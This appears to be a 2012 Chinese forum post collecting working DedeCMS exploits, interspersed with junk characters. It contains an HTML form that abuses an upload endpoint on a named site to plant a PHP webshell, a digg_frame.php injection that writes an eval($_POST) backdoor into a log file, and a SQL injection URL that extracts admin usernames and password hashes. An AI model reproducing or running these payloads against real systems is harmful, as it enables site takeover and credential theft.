0 A7 B& h" z/ A: U<body style="FONT-SIZE: 9pt">- ?# M4 P& b# p/ N; K
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />- X: i- k" K3 o" {% S; g
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
E" `: d3 N4 b, r1 s6 S- B<input type='hidden' name='activepath' value='/data/cache/' />
* D- F' T/ J# O+ e4 a2 p j<input type='hidden' name='cfg_basedir' value='../../' />
! ~% m$ K' {" {. Y2 V<input type='hidden' name='cfg_imgtype' value='php' />9 _3 A8 ?& Y9 F$ T5 R* ~
<input type='hidden' name='cfg_not_allowall' value='txt' />7 ~2 M& D& w B" |- m/ S- {4 c5 O
<input type='hidden' name='cfg_softtype' value='php' />
* \; m9 y; G s; B' H<input type='hidden' name='cfg_mediatype' value='php' />9 q+ F! H. h+ K
<input type='hidden' name='f' value='form1.enclosure' />, b! t, k! l; [9 b4 X' k
<input type='hidden' name='job' value='upload' /># x9 r5 v. b% I6 g9 I; `9 e
<input type='hidden' name='newname' value='fly.php' />
9 H* V' Y9 X! i: ^Select U Shell <input type='file' name='uploadfile' size='25' />
9 L3 H) z7 ]( v8 }' k9 p+ F. K<input type='submit' name='sb1' value='确定' />; Z* D7 Z4 A H/ K* w! I, k( E
</form>1 z3 m4 K! f7 Q- j- f# S4 s" U
<br />It's just a exp for the bug of Dedecms V55...<br />$ s+ [7 X @- S% h9 _. u7 b1 r
Need register_globals = on...<br /> | n9 t# L2 Y# m$ H
Fun the game,get a webshell at /data/cache/fly.php...<br />5 y, b' A: m1 G# m& l; O
</body>
2 C9 c) \) \7 R! @</html>7 ]9 R% E1 r9 c! g
, }' e. E. s/ ~0 u
6 v! ], F+ R% K/ {* }+ ]9 N. ~9 |" x: s
+ p1 d) ?6 b: Y- M: ~: e8 N7 |; {/ P Z4 |" w2 l- x; w' S, W u
6 j+ O# S9 o& \: @5 A0 X* x* p* a, @# s. b4 A
8 L0 L$ t' \: h( i; a( t! m0 @3 n' [
; N% [+ T- q% G9 a% k1 B: o) R织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
+ n: T" h! I9 _( }4 `, }4 I利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。- U- ]0 x* U3 c: W# ]
1. 访问网址:: }2 j/ F: g# I2 {
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>7 o; G% d6 x2 A1 `. u% C
可看见错误信息
6 ~. u. E, w! m& q* O. n& }& ~/ A* b0 _( `4 ~$ d
& Y+ a! i" N" Q: _2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。# {3 {: W: f7 p2 }% Z) e3 t, V
int(3) Error: Illegal double '1024e1024' value found during parsing
; p6 b6 E) I; @Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
, j6 c u) H [4 w4 l n9 q+ ^! q! z: [0 S( o) f n0 x$ y
- z5 W }" ~0 y# B3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
S5 x, i& P& ]& Z) C7 o y( v. b) W+ y
, e. `0 B6 b! p0 s$ d( U# Q
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
3 Q/ C7 o! b1 a8 h- p) x+ {2 n0 ~" N+ I# q: X! g; F7 w7 d ^$ Q
$ G0 ^9 N Z5 w% k7 n, Q* t( \按确定后的看到第2步骤的信息表示文件木马上传成功.) z/ M+ s& Z9 ]+ z+ z
: o/ i: f6 P7 _ f+ z. U( S# G
. G; a* Y" [6 J" }; K/ G# z J* n& C* u! F/ {! q* \2 X
# I' x, v$ O* E2 a1 K E. w" D% A/ C4 z2 D" P# D( e
* y$ }; N7 C1 a" E" n4 [; g
) }5 h. _) {8 E7 e# N/ w
3 o" Z i2 [" w' T* v) s
" y7 y- ^3 w! r$ R6 b( T+ {. V6 q
4 A) `6 E$ K0 T1 G! n4 D
* r# e/ W# i7 i) J织梦(DedeCms)plus/infosearch.php 文件注入漏洞* O1 S. Y/ p. h* I: Z
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对